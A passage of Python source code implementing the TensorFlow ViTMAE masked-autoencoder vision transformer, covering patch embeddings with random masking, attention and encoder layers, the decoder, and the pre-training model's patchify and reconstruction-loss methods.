        # this hack is needed because TF's EagerTensors don't support
        # assignment
        mask_keep = tf.zeros((batch_size, len_keep))
        mask_remove = tf.ones((batch_size, seq_length - len_keep))
        mask = tf.concat([mask_keep, mask_remove], axis=-1)
        # unshuffle to get the binary mask
        mask = tf.gather(mask, axis=1, batch_dims=1, indices=ids_restore)
        return sequence_unmasked, mask, ids_restore
    def call(self, pixel_values: tf.Tensor, noise: tf.Tensor = None) -> tf.Tensor:
        embeddings = self.patch_embeddings(pixel_values)
        # add position embeddings w/o cls token
        embeddings = embeddings + self.position_embeddings[:, 1:, :]
        # masking: length -> length * config.mask_ratio
        embeddings, mask, ids_restore = self.random_masking(embeddings, noise)
        # append cls token (with its own position embedding at index 0)
        cls_token = self.cls_token + self.position_embeddings[:, :1, :]
        cls_tokens = tf.tile(cls_token, (shape_list(embeddings)[0], 1, 1))
        embeddings = tf.concat([cls_tokens, embeddings], axis=1)
        return embeddings, mask, ids_restore
class TFViTMAEPatchEmbeddings(tf.keras.layers.Layer):
    """
    This class turns `pixel_values` of shape `(batch_size, num_channels, height, width)` into the initial
    `hidden_states` (patch embeddings) of shape `(batch_size, seq_length, hidden_size)` to be consumed by a
    Transformer.
    """
    def __init__(self, config: ViTMAEConfig, **kwargs):
        super().__init__(**kwargs)
        image_size, patch_size = config.image_size, config.patch_size
        num_channels, hidden_size = config.num_channels, config.hidden_size
        # Normalize scalar sizes to (height, width) pairs.
        image_size = image_size if isinstance(image_size, collections.abc.Iterable) else (image_size, image_size)
        patch_size = patch_size if isinstance(patch_size, collections.abc.Iterable) else (patch_size, patch_size)
        num_patches = (image_size[1] // patch_size[1]) * (image_size[0] // patch_size[0])
        self.image_size = image_size
        self.patch_size = patch_size
        self.num_patches = num_patches
        self.num_channels = num_channels
        self.config = config
        # Patchification as a strided convolution: kernel and stride both equal
        # the patch size, so each output position embeds one non-overlapping patch.
        self.projection = tf.keras.layers.Conv2D(
            filters=hidden_size,
            kernel_size=patch_size,
            strides=patch_size,
            padding="valid",
            data_format="channels_last",
            kernel_initializer="glorot_uniform",  # following torch.nn.Linear
            bias_initializer="zeros",
            name="projection",
        )
    def call(self, pixel_values: tf.Tensor, training: bool = False) -> tf.Tensor:
        batch_size, num_channels, height, width = shape_list(pixel_values)
        # Shape validation only runs eagerly; inside tf.function it is skipped.
        if tf.executing_eagerly():
            if num_channels != self.num_channels:
                raise ValueError(
                    "Make sure that the channel dimension of the pixel values match with the one set in the"
                    " configuration."
                )
            if height != self.image_size[0] or width != self.image_size[1]:
                raise ValueError(
                    f"Input image size ({height}*{width}) doesn't match model"
                    f" ({self.image_size[0]}*{self.image_size[1]})."
                )
        # When running on CPU, `tf.keras.layers.Conv2D` doesn't support `NCHW` format.
        # So change the input format from `NCHW` to `NHWC`.
        # shape = (batch_size, in_height, in_width, in_channels=num_channels)
        pixel_values = tf.transpose(pixel_values, perm=(0, 2, 3, 1))
        projection = self.projection(pixel_values)
        # Change the 2D spatial dimensions to a single temporal dimension.
        # shape = (batch_size, num_patches, out_channels=embed_dim)
        num_patches = (width // self.patch_size[1]) * (height // self.patch_size[0])
        x = tf.reshape(tensor=projection, shape=(batch_size, num_patches, -1))
        return x
# Copied from transformers.models.vit.modeling_tf_vit.TFViTSelfAttention with ViT->ViTMAE
class TFViTMAESelfAttention(tf.keras.layers.Layer):
    """Multi-head self-attention: q/k/v projections + scaled dot-product attention."""
    def __init__(self, config: ViTMAEConfig, **kwargs):
        super().__init__(**kwargs)
        if config.hidden_size % config.num_attention_heads != 0:
            raise ValueError(
                f"The hidden size ({config.hidden_size}) is not a multiple of the number "
                f"of attention heads ({config.num_attention_heads})"
            )
        self.num_attention_heads = config.num_attention_heads
        self.attention_head_size = int(config.hidden_size / config.num_attention_heads)
        self.all_head_size = self.num_attention_heads * self.attention_head_size
        # Precomputed sqrt(d_k), used to scale the raw attention scores.
        self.sqrt_att_head_size = math.sqrt(self.attention_head_size)
        self.query = tf.keras.layers.Dense(
            units=self.all_head_size, kernel_initializer=get_initializer(config.initializer_range), name="query"
        )
        self.key = tf.keras.layers.Dense(
            units=self.all_head_size, kernel_initializer=get_initializer(config.initializer_range), name="key"
        )
        self.value = tf.keras.layers.Dense(
            units=self.all_head_size, kernel_initializer=get_initializer(config.initializer_range), name="value"
        )
        self.dropout = tf.keras.layers.Dropout(rate=config.attention_probs_dropout_prob)
    def transpose_for_scores(self, tensor: tf.Tensor, batch_size: int) -> tf.Tensor:
        # Reshape from [batch_size, seq_length, all_head_size] to [batch_size, seq_length, num_attention_heads, attention_head_size]
        tensor = tf.reshape(tensor=tensor, shape=(batch_size, -1, self.num_attention_heads, self.attention_head_size))
        # Transpose the tensor from [batch_size, seq_length, num_attention_heads, attention_head_size] to [batch_size, num_attention_heads, seq_length, attention_head_size]
        return tf.transpose(tensor, perm=[0, 2, 1, 3])
    def call(
        self,
        hidden_states: tf.Tensor,
        head_mask: tf.Tensor,
        output_attentions: bool,
        training: bool = False,
    ) -> Tuple[tf.Tensor]:
        batch_size = shape_list(hidden_states)[0]
        mixed_query_layer = self.query(inputs=hidden_states)
        mixed_key_layer = self.key(inputs=hidden_states)
        mixed_value_layer = self.value(inputs=hidden_states)
        query_layer = self.transpose_for_scores(mixed_query_layer, batch_size)
        key_layer = self.transpose_for_scores(mixed_key_layer, batch_size)
        value_layer = self.transpose_for_scores(mixed_value_layer, batch_size)
        # Take the dot product between "query" and "key" to get the raw attention scores.
        # (batch size, num_heads, seq_len_q, seq_len_k)
        attention_scores = tf.matmul(query_layer, key_layer, transpose_b=True)
        dk = tf.cast(self.sqrt_att_head_size, dtype=attention_scores.dtype)
        attention_scores = tf.divide(attention_scores, dk)
        # Normalize the attention scores to probabilities.
        attention_probs = stable_softmax(logits=attention_scores, axis=-1)
        # This is actually dropping out entire tokens to attend to, which might
        # seem a bit unusual, but is taken from the original Transformer paper.
        attention_probs = self.dropout(inputs=attention_probs, training=training)
        # Mask heads if we want to
        if head_mask is not None:
            attention_probs = tf.multiply(attention_probs, head_mask)
        attention_output = tf.matmul(attention_probs, value_layer)
        attention_output = tf.transpose(attention_output, perm=[0, 2, 1, 3])
        # (batch_size, seq_len_q, all_head_size)
        attention_output = tf.reshape(tensor=attention_output, shape=(batch_size, -1, self.all_head_size))
        outputs = (attention_output, attention_probs) if output_attentions else (attention_output,)
        return outputs
# Copied from transformers.models.vit.modeling_tf_vit.TFViTSelfOutput with ViT->ViTMAE
class TFViTMAESelfOutput(tf.keras.layers.Layer):
    """
    The residual connection is defined in TFViTMAELayer instead of here (as is the case with other models), due to the
    layernorm applied before each block.
    """
    def __init__(self, config: ViTMAEConfig, **kwargs):
        super().__init__(**kwargs)
        self.dense = tf.keras.layers.Dense(
            units=config.hidden_size, kernel_initializer=get_initializer(config.initializer_range), name="dense"
        )
        self.dropout = tf.keras.layers.Dropout(rate=config.hidden_dropout_prob)
    def call(self, hidden_states: tf.Tensor, input_tensor: tf.Tensor, training: bool = False) -> tf.Tensor:
        # `input_tensor` is accepted for interface parity with other models but is
        # intentionally unused here — the residual add happens in TFViTMAELayer.
        hidden_states = self.dense(inputs=hidden_states)
        hidden_states = self.dropout(inputs=hidden_states, training=training)
        return hidden_states
# Copied from transformers.models.vit.modeling_tf_vit.TFViTAttention with ViT->ViTMAE
class TFViTMAEAttention(tf.keras.layers.Layer):
    """Self-attention followed by its output projection (no residual here)."""
    def __init__(self, config: ViTMAEConfig, **kwargs):
        super().__init__(**kwargs)
        self.self_attention = TFViTMAESelfAttention(config, name="attention")
        self.dense_output = TFViTMAESelfOutput(config, name="output")
    def prune_heads(self, heads):
        # Head pruning is not supported in the TF implementation.
        raise NotImplementedError
    def call(
        self,
        input_tensor: tf.Tensor,
        head_mask: tf.Tensor,
        output_attentions: bool,
        training: bool = False,
    ) -> Tuple[tf.Tensor]:
        self_outputs = self.self_attention(
            hidden_states=input_tensor, head_mask=head_mask, output_attentions=output_attentions, training=training
        )
        attention_output = self.dense_output(
            hidden_states=self_outputs[0], input_tensor=input_tensor, training=training
        )
        outputs = (attention_output,) + self_outputs[1:]  # add attentions if we output them
        return outputs
# Copied from transformers.models.vit.modeling_tf_vit.TFViTIntermediate with ViT->ViTMAE
class TFViTMAEIntermediate(tf.keras.layers.Layer):
    """Feed-forward expansion: Dense to `intermediate_size` + activation."""
    def __init__(self, config: ViTMAEConfig, **kwargs):
        super().__init__(**kwargs)
        self.dense = tf.keras.layers.Dense(
            units=config.intermediate_size, kernel_initializer=get_initializer(config.initializer_range), name="dense"
        )
        # `hidden_act` may be a string name or already a callable.
        if isinstance(config.hidden_act, str):
            self.intermediate_act_fn = get_tf_activation(config.hidden_act)
        else:
            self.intermediate_act_fn = config.hidden_act
    def call(self, hidden_states: tf.Tensor) -> tf.Tensor:
        hidden_states = self.dense(inputs=hidden_states)
        hidden_states = self.intermediate_act_fn(hidden_states)
        return hidden_states
# Copied from transformers.models.vit.modeling_tf_vit.TFViTOutput with ViT->ViTMAE
class TFViTMAEOutput(tf.keras.layers.Layer):
    """Feed-forward contraction back to `hidden_size`; applies the residual add."""
    def __init__(self, config: ViTMAEConfig, **kwargs):
        super().__init__(**kwargs)
        self.dense = tf.keras.layers.Dense(
            units=config.hidden_size, kernel_initializer=get_initializer(config.initializer_range), name="dense"
        )
        self.dropout = tf.keras.layers.Dropout(rate=config.hidden_dropout_prob)
    def call(self, hidden_states: tf.Tensor, input_tensor: tf.Tensor, training: bool = False) -> tf.Tensor:
        hidden_states = self.dense(inputs=hidden_states)
        hidden_states = self.dropout(inputs=hidden_states, training=training)
        # Second residual connection of the transformer block.
        hidden_states = hidden_states + input_tensor
        return hidden_states
# Copied from transformers.models.vit.modeling_tf_vit.TFViTLayer with ViT->ViTMAE
class TFViTMAELayer(tf.keras.layers.Layer):
    """This corresponds to the Block class in the timm implementation."""
    def __init__(self, config: ViTMAEConfig, **kwargs):
        super().__init__(**kwargs)
        self.attention = TFViTMAEAttention(config, name="attention")
        self.intermediate = TFViTMAEIntermediate(config, name="intermediate")
        self.vit_output = TFViTMAEOutput(config, name="output")
        # Pre-norm transformer block: layernorm is applied before each sub-layer.
        self.layernorm_before = tf.keras.layers.LayerNormalization(
            epsilon=config.layer_norm_eps, name="layernorm_before"
        )
        self.layernorm_after = tf.keras.layers.LayerNormalization(
            epsilon=config.layer_norm_eps, name="layernorm_after"
        )
    def call(
        self,
        hidden_states: tf.Tensor,
        head_mask: tf.Tensor,
        output_attentions: bool,
        training: bool = False,
    ) -> Tuple[tf.Tensor]:
        attention_outputs = self.attention(
            # in ViTMAE, layernorm is applied before self-attention
            input_tensor=self.layernorm_before(inputs=hidden_states),
            head_mask=head_mask,
            output_attentions=output_attentions,
            training=training,
        )
        attention_output = attention_outputs[0]
        # first residual connection
        hidden_states = attention_output + hidden_states
        # in ViTMAE, layernorm is also applied after self-attention
        layer_output = self.layernorm_after(inputs=hidden_states)
        intermediate_output = self.intermediate(hidden_states=layer_output)
        # second residual connection is done here (inside TFViTMAEOutput)
        layer_output = self.vit_output(
            hidden_states=intermediate_output, input_tensor=hidden_states, training=training
        )
        outputs = (layer_output,) + attention_outputs[1:]  # add attentions if we output them
        return outputs
# Copied from transformers.models.vit.modeling_tf_vit.TFViTEncoder with ViT->ViTMAE
class TFViTMAEEncoder(tf.keras.layers.Layer):
    """Stack of `config.num_hidden_layers` transformer blocks."""
    def __init__(self, config: ViTMAEConfig, **kwargs):
        super().__init__(**kwargs)
        self.layer = [TFViTMAELayer(config, name=f"layer_._{i}") for i in range(config.num_hidden_layers)]
    def call(
        self,
        hidden_states: tf.Tensor,
        head_mask: tf.Tensor,
        output_attentions: bool,
        output_hidden_states: bool,
        return_dict: bool,
        training: bool = False,
    ) -> Union[TFBaseModelOutput, Tuple[tf.Tensor]]:
        # Accumulate per-layer outputs only when requested.
        all_hidden_states = () if output_hidden_states else None
        all_attentions = () if output_attentions else None
        for i, layer_module in enumerate(self.layer):
            if output_hidden_states:
                all_hidden_states = all_hidden_states + (hidden_states,)
            layer_outputs = layer_module(
                hidden_states=hidden_states,
                head_mask=head_mask[i],
                output_attentions=output_attentions,
                training=training,
            )
            hidden_states = layer_outputs[0]
            if output_attentions:
                all_attentions = all_attentions + (layer_outputs[1],)
        # Add last layer
        if output_hidden_states:
            all_hidden_states = all_hidden_states + (hidden_states,)
        if not return_dict:
            return tuple(v for v in [hidden_states, all_hidden_states, all_attentions] if v is not None)
        return TFBaseModelOutput(
            last_hidden_state=hidden_states, hidden_states=all_hidden_states, attentions=all_attentions
        )
@keras_serializable
class TFViTMAEMainLayer(tf.keras.layers.Layer):
    """ViTMAE encoder core: masking patch embeddings, transformer encoder, final layernorm."""
    config_class = ViTMAEConfig
    def __init__(self, config: ViTMAEConfig, **kwargs):
        super().__init__(**kwargs)
        self.config = config
        self.embeddings = TFViTMAEEmbeddings(config, name="embeddings")
        self.encoder = TFViTMAEEncoder(config, name="encoder")
        self.layernorm = tf.keras.layers.LayerNormalization(epsilon=config.layer_norm_eps, name="layernorm")
    def get_input_embeddings(self) -> tf.keras.layers.Layer:
        # The patch-projection layer acts as the model's "input embedding".
        return self.embeddings.patch_embeddings
    def _prune_heads(self, heads_to_prune):
        """
        Prunes heads of the model. heads_to_prune: dict of {layer_num: list of heads to prune in this layer} See base
        class PreTrainedModel
        """
        raise NotImplementedError
    @unpack_inputs
    def call(
        self,
        pixel_values: Optional[TFModelInputType] = None,
        noise: tf.Tensor = None,
        head_mask: Optional[Union[np.ndarray, tf.Tensor]] = None,
        output_attentions: Optional[bool] = None,
        output_hidden_states: Optional[bool] = None,
        return_dict: Optional[bool] = None,
        training: bool = False,
    ) -> Union[TFViTMAEModelOutput, Tuple[tf.Tensor]]:
        """Embed (with masking), encode, layer-normalize; also returns the patch mask
        and the `ids_restore` indices produced by the embeddings."""
        # `noise` is forwarded to the embeddings — presumably to make the random masking
        # reproducible; confirm against TFViTMAEEmbeddings.
        embedding_output, mask, ids_restore = self.embeddings(
            pixel_values=pixel_values, training=training, noise=noise
        )
        # Prepare head mask if needed
        # 1.0 in head_mask indicate we keep the head
        # attention_probs has shape bsz x n_heads x N x N
        # input head_mask has shape [num_heads] or [num_hidden_layers x num_heads]
        # and head_mask is converted to shape [num_hidden_layers x batch x num_heads x seq_length x seq_length]
        if head_mask is not None:
            # Head masking is not implemented in this TF port.
            raise NotImplementedError
        else:
            head_mask = [None] * self.config.num_hidden_layers
        encoder_outputs = self.encoder(
            embedding_output,
            head_mask=head_mask,
            output_attentions=output_attentions,
            output_hidden_states=output_hidden_states,
            return_dict=return_dict,
            training=training,
        )
        sequence_output = encoder_outputs[0]
        sequence_output = self.layernorm(inputs=sequence_output)
        if not return_dict:
            return (sequence_output, mask, ids_restore) + encoder_outputs[1:]
        return TFViTMAEModelOutput(
            last_hidden_state=sequence_output,
            mask=mask,
            ids_restore=ids_restore,
            hidden_states=encoder_outputs.hidden_states,
            attentions=encoder_outputs.attentions,
        )
class TFViTMAEPreTrainedModel(TFPreTrainedModel):
    """
    An abstract class to handle weights initialization and a simple interface for downloading and loading pretrained
    models.
    """
    config_class = ViTMAEConfig
    base_model_prefix = "vit"
    main_input_name = "pixel_values"
    @property
    def dummy_inputs(self) -> Dict[str, tf.Tensor]:
        """
        Dummy inputs to build the network. Returns:
        `Dict[str, tf.Tensor]`: The dummy inputs.
        """
        # Batch of 3 random images in channels-first layout, sized from the config.
        VISION_DUMMY_INPUTS = tf.random.uniform(
            shape=(3, self.config.num_channels, self.config.image_size, self.config.image_size),
            dtype=tf.float32,
        )
        return {"pixel_values": tf.constant(VISION_DUMMY_INPUTS)}
    @tf.function(
        input_signature=[
            {
                # Fully dynamic shape so the SavedModel signature accepts any batch/image size.
                "pixel_values": tf.TensorSpec((None, None, None, None), tf.float32, name="pixel_values"),
            }
        ]
    )
    def serving(self, inputs):
        """
        Method used for serving the model.
        Args:
            inputs (`Dict[str, tf.Tensor]`):
                The input of the saved model as a dictionary of tensors.
        """
        output = self.call(inputs)
        return self.serving_output(output)
VIT_MAE_START_DOCSTRING = r"""
This model inherits from [`TFPreTrainedModel`]. Check the superclass documentation for the generic methods the
library implements for all its model (such as downloading or saving, resizing the input embeddings, pruning heads
etc.)
This model is also a [tf.keras.Model](https://www.tensorflow.org/api_docs/python/tf/keras/Model) subclass. Use it
as a regular TF 2.0 Keras Model and refer to the TF 2.0 documentation for all matter related to general usage and
behavior.
<Tip>
TensorFlow models and layers in `transformers` accept two formats as input:
- having all inputs as keyword arguments (like PyTorch models), or
- having all inputs as a list, tuple or dict in the first positional argument.
The reason the second format is supported is that Keras methods prefer this format when passing inputs to models
and layers. Because of this support, when using methods like `model.fit()` things should "just work" for you - just
pass your inputs and labels in any format that `model.fit()` supports! If, however, you want to use the second
format outside of Keras methods like `fit()` and `predict()`, such as when creating your own layers or models with
the Keras `Functional` API, there are three possibilities you can use to gather all the input Tensors in the first
positional argument:
- a single Tensor with `pixel_values` only and nothing else: `model(pixel_values)`
- a list of varying length with one or several input Tensors IN THE ORDER given in the docstring:
`model([pixel_values, attention_mask])` or `model([pixel_values, attention_mask, token_type_ids])`
- a dictionary with one or several input Tensors associated to the input names given in the docstring:
`model({"pixel_values": pixel_values, "token_type_ids": token_type_ids})`
Note that when creating models and layers with
[subclassing](https://keras.io/guides/making_new_layers_and_models_via_subclassing/) then you don't need to worry
about any of this, as you can just pass inputs like you would to any other Python function!
</Tip>
Args:
config ([`ViTMAEConfig`]): Model configuration class with all the parameters of the model.
Initializing with a config file does not load the weights associated with the model, only the
configuration. Check out the [`~TFPreTrainedModel.from_pretrained`] method to load the model weights.
"""
# Per-argument documentation, injected into `call` via `@add_start_docstrings_to_model_forward`.
# Fixed broken backtick markup: the `pixel_values` type list was missing a comma and carried a
# stray double backtick, and `False` had a doubled closing backtick.
VIT_MAE_INPUTS_DOCSTRING = r"""
    Args:
        pixel_values (`np.ndarray`, `tf.Tensor`, `List[tf.Tensor]`, `Dict[str, tf.Tensor]` or `Dict[str, np.ndarray]` and each example must have the shape `(batch_size, num_channels, height, width)`):
            Pixel values. Pixel values can be obtained using [`AutoImageProcessor`]. See [`ViTImageProcessor.__call__`]
            for details.
        head_mask (`np.ndarray` or `tf.Tensor` of shape `(num_heads,)` or `(num_layers, num_heads)`, *optional*):
            Mask to nullify selected heads of the self-attention modules. Mask values selected in `[0, 1]`:
            - 1 indicates the head is **not masked**,
            - 0 indicates the head is **masked**.
        output_attentions (`bool`, *optional*):
            Whether or not to return the attentions tensors of all attention layers. See `attentions` under returned
            tensors for more detail. This argument can be used only in eager mode, in graph mode the value in the
            config will be used instead.
        output_hidden_states (`bool`, *optional*):
            Whether or not to return the hidden states of all layers. See `hidden_states` under returned tensors for
            more detail. This argument can be used only in eager mode, in graph mode the value in the config will be
            used instead.
        return_dict (`bool`, *optional*):
            Whether or not to return a [`~file_utils.ModelOutput`] instead of a plain tuple. This argument can be used
            in eager mode, in graph mode the value will always be set to True.
        training (`bool`, *optional*, defaults to `False`):
            Whether or not to use the model in training mode (some modules like dropout modules have different
            behaviors between training and evaluation).
"""
@add_start_docstrings(
    "The bare ViTMAE Model transformer outputting raw hidden-states without any specific head on top.",
    VIT_MAE_START_DOCSTRING,
)
class TFViTMAEModel(TFViTMAEPreTrainedModel):
    """Thin model wrapper exposing `TFViTMAEMainLayer` under the standard model API."""
    def __init__(self, config: ViTMAEConfig, *inputs, **kwargs):
        super().__init__(config, *inputs, **kwargs)
        self.vit = TFViTMAEMainLayer(config, name="vit")
    def get_input_embeddings(self):
        return self.vit.get_input_embeddings()
    @unpack_inputs
    @add_start_docstrings_to_model_forward(VIT_MAE_INPUTS_DOCSTRING)
    @replace_return_docstrings(output_type=TFViTMAEModelOutput, config_class=_CONFIG_FOR_DOC)
    def call(
        self,
        pixel_values: Optional[TFModelInputType] = None,
        noise: tf.Tensor = None,
        head_mask: Optional[Union[np.ndarray, tf.Tensor]] = None,
        output_attentions: Optional[bool] = None,
        output_hidden_states: Optional[bool] = None,
        return_dict: Optional[bool] = None,
        training: bool = False,
    ) -> Union[TFViTMAEModelOutput, Tuple[tf.Tensor]]:
        r"""
        Returns:
        Examples:
        ```python
        >>> from transformers import AutoImageProcessor, TFViTMAEModel
        >>> from PIL import Image
        >>> import requests
        >>> url = "http://images.cocodataset.org/val2017/000000039769.jpg"
        >>> image = Image.open(requests.get(url, stream=True).raw)
        >>> image_processor = AutoImageProcessor.from_pretrained("facebook/vit-mae-base")
        >>> model = TFViTMAEModel.from_pretrained("facebook/vit-mae-base")
        >>> inputs = image_processor(images=image, return_tensors="tf")
        >>> outputs = model(**inputs)
        >>> last_hidden_states = outputs.last_hidden_state
        ```"""
        # All work is delegated to the main layer.
        outputs = self.vit(
            pixel_values=pixel_values,
            noise=noise,
            head_mask=head_mask,
            output_attentions=output_attentions,
            output_hidden_states=output_hidden_states,
            return_dict=return_dict,
            training=training,
        )
        return outputs
    def serving_output(self, output: TFViTMAEModelOutput) -> TFViTMAEModelOutput:
        # Convert tuple-valued fields to tensors for the SavedModel signature; fields
        # not enabled in the config are dropped (None).
        hidden_states = tf.convert_to_tensor(output.hidden_states) if self.config.output_hidden_states else None
        attentions = tf.convert_to_tensor(output.attentions) if self.config.output_attentions else None
        return TFViTMAEModelOutput(
            last_hidden_state=output.last_hidden_state,
            mask=output.mask,
            ids_restore=output.ids_restore,
            hidden_states=hidden_states,
            attentions=attentions,
        )
class TFViTMAEDecoder(tf.keras.layers.Layer):
    """MAE decoder: projects the encoder output, re-inserts a learned mask token for every
    dropped patch, adds fixed sin-cos position embeddings, runs a small transformer stack,
    and predicts `patch_size**2 * num_channels` pixel values per patch."""
    def __init__(self, config, num_patches, **kwargs):
        super().__init__(**kwargs)
        # Projects encoder hidden states into the decoder width.
        self.decoder_embed = tf.keras.layers.Dense(config.decoder_hidden_size, name="decoder_embed")
        # The decoder transformer is configured from the `decoder_*` fields of the config.
        decoder_config = deepcopy(config)
        decoder_config.hidden_size = config.decoder_hidden_size
        decoder_config.num_hidden_layers = config.decoder_num_hidden_layers
        decoder_config.num_attention_heads = config.decoder_num_attention_heads
        decoder_config.intermediate_size = config.decoder_intermediate_size
        self.decoder_layers = [
            TFViTMAELayer(decoder_config, name=f"decoder_layers.{j}") for j in range(config.decoder_num_hidden_layers)
        ]
        self.decoder_norm = tf.keras.layers.LayerNormalization(epsilon=config.layer_norm_eps, name="decoder_norm")
        self.decoder_pred = tf.keras.layers.Dense(
            config.patch_size**2 * config.num_channels,
            kernel_initializer=get_initializer(config.initializer_range),
            name="decoder_pred",
        )  # encoder to decoder
        self.config = config
        self.num_patches = num_patches
    def build(self, input_shape: tf.TensorShape):
        # Learnable token substituted for every masked patch.
        self.mask_token = self.add_weight(
            shape=(1, 1, self.config.decoder_hidden_size),
            initializer=tf.random_normal_initializer(stddev=self.config.initializer_range),
            trainable=True,
            name="mask_token",
        )
        # Fixed (non-trainable) 2D sin-cos position embeddings, with one extra CLS slot.
        self.decoder_pos_embed = self.add_weight(
            shape=(1, self.num_patches + 1, self.config.decoder_hidden_size),
            initializer="zeros",
            trainable=False,
            name="decoder_pos_embed",
        )
        decoder_pos_embed = get_2d_sincos_pos_embed(
            self.decoder_pos_embed.shape[-1],
            int(self.num_patches**0.5),
            add_cls_token=True,
        )[None, ...]
        self.decoder_pos_embed.assign(decoder_pos_embed)
        super().build(input_shape)
    def call(
        self,
        hidden_states,
        ids_restore,
        output_attentions=False,
        output_hidden_states=False,
        return_dict=True,
    ):
        """Produce per-patch pixel predictions (`logits`) from the encoder's masked sequence."""
        # embed tokens
        x = self.decoder_embed(hidden_states)
        # append mask tokens to sequence (one for each patch the encoder dropped)
        mask_tokens = tf.tile(
            self.mask_token,
            (shape_list(x)[0], shape_list(ids_restore)[1] + 1 - shape_list(x)[1], 1),
        )
        x_ = tf.concat([x[:, 1:, :], mask_tokens], axis=1)  # no cls token
        x_ = tf.gather(x_, axis=1, batch_dims=1, indices=ids_restore)  # unshuffle
        x = tf.concat([x[:, :1, :], x_], axis=1)  # append cls token
        # add pos embed
        hidden_states = x + self.decoder_pos_embed
        # apply Transformer layers (blocks)
        all_hidden_states = () if output_hidden_states else None
        all_self_attentions = () if output_attentions else None
        for i, layer_module in enumerate(self.decoder_layers):
            if output_hidden_states:
                all_hidden_states = all_hidden_states + (hidden_states,)
            layer_outputs = layer_module(
                hidden_states,
                head_mask=None,
                output_attentions=output_attentions,
            )
            hidden_states = layer_outputs[0]
            if output_attentions:
                all_self_attentions = all_self_attentions + (layer_outputs[1],)
        if output_hidden_states:
            all_hidden_states = all_hidden_states + (hidden_states,)
        hidden_states = self.decoder_norm(hidden_states)
        # predictor projection
        logits = self.decoder_pred(hidden_states)
        # remove cls token
        logits = logits[:, 1:, :]
        if not return_dict:
            return tuple(v for v in [logits, all_hidden_states, all_self_attentions] if v is not None)
        return TFViTMAEDecoderOutput(logits=logits, hidden_states=all_hidden_states, attentions=all_self_attentions)
@add_start_docstrings(
    "The ViTMAE Model transformer with the decoder on top for self-supervised pre-training.",
    VIT_MAE_START_DOCSTRING,
)
class TFViTMAEForPreTraining(TFViTMAEPreTrainedModel):
    """MAE pre-training model: the ViT encoder (`TFViTMAEMainLayer`) plus a decoder predicting
    per-patch pixel values; the reconstruction loss is averaged over masked patches only
    (see `forward_loss`)."""
    def __init__(self, config):
        super().__init__(config)
        self.config = config
        self.vit = TFViTMAEMainLayer(config, name="vit")
        self.decoder = TFViTMAEDecoder(
            config,
            num_patches=self.vit.embeddings.num_patches,
            name="decoder",
        )
    def get_input_embeddings(self):
        # Delegate to the encoder's patch-embedding layer.
        return self.vit.get_input_embeddings()
    def _prune_heads(self, heads_to_prune):
        # Head pruning is not supported for this model.
        raise NotImplementedError
    def patchify(self, pixel_values):
        """
        Split images into flattened non-overlapping patches.

        Args:
            pixel_values (`tf.Tensor` of shape `(batch_size, height, width, num_channels)` or `(batch_size, num_channels, height, width)`):
                Pixel values.
        Returns:
            `tf.Tensor` of shape `(batch_size, num_patches, patch_size**2 * num_channels)`:
                Patchified pixel values.
        """
        patch_size, num_channels = self.config.patch_size, self.config.num_channels
        # make sure channels are last
        pixel_values = tf.cond(
            tf.math.equal(shape_list(pixel_values)[1], num_channels),
            lambda: tf.transpose(pixel_values, perm=(0, 2, 3, 1)),
            lambda: pixel_values,
        )
        # sanity checks
        tf.debugging.assert_equal(
            shape_list(pixel_values)[1],
            shape_list(pixel_values)[2],
            message="Make sure the pixel values have a squared size",
        )
        tf.debugging.assert_equal(
            shape_list(pixel_values)[1] % patch_size,
            0,
            message="Make sure the pixel values have a size that is divisible by the patch size",
        )
        tf.debugging.assert_equal(
            shape_list(pixel_values)[3],
            num_channels,
            message=(
                "Make sure the number of channels of the pixel values is equal to the one set in the configuration"
            ),
        )
        # patchify: (B, H, W, C) -> (B, h, p, w, q, C) -> (B, h, w, p, q, C) -> (B, h*w, p*q*C)
        batch_size = shape_list(pixel_values)[0]
        num_patches_one_direction = shape_list(pixel_values)[2] // patch_size
        patchified_pixel_values = tf.reshape(
            pixel_values,
            (batch_size, num_patches_one_direction, patch_size, num_patches_one_direction, patch_size, num_channels),
        )
        patchified_pixel_values = tf.einsum("nhpwqc->nhwpqc", patchified_pixel_values)
        patchified_pixel_values = tf.reshape(
            patchified_pixel_values,
            (batch_size, num_patches_one_direction * num_patches_one_direction, patch_size**2 * num_channels),
        )
        return patchified_pixel_values
    def unpatchify(self, patchified_pixel_values):
        """
        Inverse of `patchify`: reassemble flattened patches into channels-last images.

        Args:
            patchified_pixel_values (`tf.Tensor` of shape `(batch_size, num_patches, patch_size**2 * num_channels)`:
                Patchified pixel values.
        Returns:
            `tf.Tensor` of shape `(batch_size, height, width, num_channels)`:
                Pixel values.
        """
        patch_size, num_channels = self.config.patch_size, self.config.num_channels
        num_patches_one_direction = int(shape_list(patchified_pixel_values)[1] ** 0.5)
        # sanity check
        tf.debugging.assert_equal(
            num_patches_one_direction * num_patches_one_direction,
            shape_list(patchified_pixel_values)[1],
            message="Make sure that the number of patches can be squared",
        )
        # unpatchify (mirrors the einsum in `patchify`)
        batch_size = shape_list(patchified_pixel_values)[0]
        patchified_pixel_values = tf.reshape(
            patchified_pixel_values,
            (batch_size, num_patches_one_direction, num_patches_one_direction, patch_size, patch_size, num_channels),
        )
        patchified_pixel_values = tf.einsum("nhwpqc->nhpwqc", patchified_pixel_values)
        pixel_values = tf.reshape(
            patchified_pixel_values,
            (batch_size, num_patches_one_direction * patch_size, num_patches_one_direction * patch_size, num_channels),
        )
        return pixel_values
    def forward_loss(self, pixel_values, pred, mask):
        """
        Compute the mean-squared pixel reconstruction loss over masked patches.

        Args:
            pixel_values (`tf.Tensor` of shape `(batch_size, height, width, num_channels)`):
                Pixel values.
            pred (`tf.Tensor` of shape `(batch_size, num_patches, patch_size**2 * num_channels)`:
                Predicted pixel values.
            mask (`tf.Tensor` of shape `(batch_size, sequence_length)`):
                Tensor indicating which patches are masked (1) and which are not (0).
        Returns:
            `tf.Tensor`: Pixel reconstruction loss.
        """
        target = self.patchify(pixel_values)
        if self.config.norm_pix_loss:
            # Normalize each target patch to zero mean / unit variance before comparing.
            mean = tf.reduce_mean(target, axis=-1, keepdims=True)
            var = tf.math.reduce_variance(target, axis=-1, keepdims=True)
            target = (target - mean) / (var + 1.0e-6) ** 0.5
        loss = (pred - target) ** 2
        loss = tf.reduce_mean(loss, axis=-1)  # [batch_size, num_patches], mean loss per patch
        loss = tf.reduce_sum(loss * mask) / tf.reduce_sum(mask)  # mean loss on removed patches
        loss = tf.reshape(loss, (1,))
        return loss
    @unpack_inputs
    @add_start_docstrings_to_model_forward(VIT_MAE_INPUTS_DOCSTRING)
